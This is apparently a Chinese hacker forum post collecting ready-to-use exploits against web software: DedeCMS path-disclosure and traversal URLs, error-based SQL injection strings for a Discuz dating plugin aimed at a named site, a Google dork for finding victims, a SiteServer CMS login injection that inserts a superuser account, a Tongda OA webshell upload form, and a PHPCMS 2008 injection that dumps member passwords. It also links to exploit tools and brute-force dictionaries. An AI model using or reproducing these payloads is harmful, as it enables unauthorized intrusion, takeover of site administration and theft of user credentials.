一、dedecms找后台


1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理

员帐号,新版本的就直接转向了后台.

2.include/dialog/config.php会爆出后台管理路径

3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录

4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.

5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉

到根目录去.不过这些版本的访问地址有些不同.

地址为require/dialog/select_soft.php?activepath=/././././././././

include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..

存在相同问题的文件还有

include\dialog\select_p_w_picpaths.php

include\dialog\select_media.php

include\dialog\select_templets.php

/data/mysql_error_trace.inc

dedecms爆绝对路径工具:http://pan.baidu.com/share/link?shareid=424516&uk=2754130026



二、dz交友插件漏洞


测试EXP

http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1


http://www.gzcity.com/jiaoyou.php?pid=1' or @`'` and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) or @`'` and '1'='1

应广大×××需求~~~附上自己组合的关键字一个:谷歌关键字Powered by Discuz!inurl:jiaoyou.php 


漏洞利用工具:http://pan.baidu.com/share/link?shareid=424518&uk=2754130026


3.最近360爆的 ecshop支付宝漏洞  通杀2.73及以下版本 

漏洞利用工具下载:

http://pan.baidu.com/share/link?shareid=424515&uk=2754130026



4、SiteServer CMS  oday


EXP:

直接访问UserCenter/login.aspx 

用户名处输入:

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

密码为空,输入验证码后提交,

既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。


后台拿shell 自己百度 8种方法siteserver后台getwebshell



5、几个C段ip入侵扫描或者内网入侵的小工具

  iisput这个都知道

  第二个这个 wvs  http://pan.baidu.com/share/link?shareid=424521&uk=2754130026

  第三个这个 sx   http://pan.baidu.com/share/link?shareid=424527&uk=2754130026



6.通达oa  getshell

下面我附一下利用exp

保存下面的代码为1.html  如果需要测试的话,只需要将192.168.56.139改成你的目标站点

exp 放在这里


<form id="frmUpload" enctype="multipart/form-data"

action="http://192.168.56.139/general/vmeet/privateUpload.php?fileName=555.php.111″ method="post">Upload a new file:<br>

<input type="file" name="Filedata" size="50″><br>

<input type="submit" value="Upload">

<!–  http://192.168.56.139/general/vmeet/upload/temp/555.php.111    这里是上传之后的网马–>

</form>



7  phpcms 2008  漏洞 


给出exp

  www.xxxxx.com/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2′ and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0×27,username,0x3a,password,0×27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)– a



8. 几个爆破 shell后门扫描字典http://pan.baidu.com/share/link?shareid=424534&uk=2754130026